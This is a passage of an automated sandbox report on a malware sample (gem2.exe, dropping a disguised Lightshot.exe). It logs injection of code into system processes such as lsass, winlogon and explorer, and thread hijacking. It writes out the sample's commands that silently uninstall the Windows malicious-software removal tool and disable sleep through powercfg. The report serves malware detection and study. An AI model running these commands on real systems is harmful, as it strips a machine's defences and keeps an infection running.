          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FB7270000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF53B50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 164E88A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25177B50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28D5D340000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 24EB5E10000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F153C20000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D241D40000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16FADAD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 20E03070000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15204DB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 1200000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 175C5280000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22EF1B30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 261DE4D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74520000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 226D8930000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13E5E930000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844120000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27234C50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28543540000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B684340000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F8362A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 20E3F2F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 238A0910000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E3DC7B0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2B9EDBC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1EFFF1A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2490F910000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2961B670000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2961BA20000 value starts with: 4D5A
          Injects code into the Windows Explorer (explorer.exe)
          Source: C:\Windows\System32\dialer.exeMemory written: PID: 1028 base: 1200000 value: 4D
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\gem2.exeThread register set: target process: 7888Jump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeThread register set: target process: 7660Jump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeThread register set: target process: 7724Jump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeThread register set: target process: 7720Jump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195DD590000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CB80000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2490F800000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E8589B0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 140AE890000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195DE1A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CBB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 257E1070000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2652E0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 254A27A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24B87DA0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 205FB3C0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A205670000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18EC1F30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26238950000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2786E560000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1611FF70000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27C0F350000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B279570000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E70A460000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22D13110000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22C8C580000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2825F1D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20BAEC90000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C782530000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: A60000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24066EB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 181CEDB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A142790000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195B6F30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DCA0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBFA540000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A239D90000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17CFA390000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FB7270000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF53B50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 164E88A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25177B50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28D5D340000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 24EB5E10000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F153C20000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D241D40000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16FADAD0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 20E03070000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15204DB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 1200000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 175C5280000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22EF1B30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34F0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 261DE4D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74520000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 226D8930000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13E5E930000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844120000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27234C50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28543540000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B684340000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F8362A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 20E3F2F0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 238A0910000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E3DC7B0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2B9EDBC0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1EFFF1A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2490F910000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2961B670000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 2961BA20000
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\dialer.exeCode function: 23_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,23_2_0000000140001B54
          Source: C:\Windows\System32\dialer.exeCode function: 23_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,23_2_0000000140001B54
          Source: winlogon.exe, 0000001D.00000000.2094526349.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001D.00000002.3311375682.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000002.3318403400.0000011605AB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: winlogon.exe, 0000001D.00000000.2094526349.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001D.00000002.3311375682.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000000.2108549670.0000011605EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: winlogon.exe, 0000001D.00000000.2094526349.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001D.00000002.3311375682.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000000.2108549670.0000011605EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: winlogon.exe, 0000001D.00000000.2094526349.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001D.00000002.3311375682.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000000.2108549670.0000011605EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\System32\winlogon.exeCode function: 29_2_000001E8589636F0 cpuid 29_2_000001E8589636F0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\dialer.exeCode function: 23_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,23_2_0000000140001B54
          Source: C:\Windows\System32\winlogon.exeCode function: 29_2_000001E858987960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,29_2_000001E858987960
          Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Modifies power options to not sleep / hibernate
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
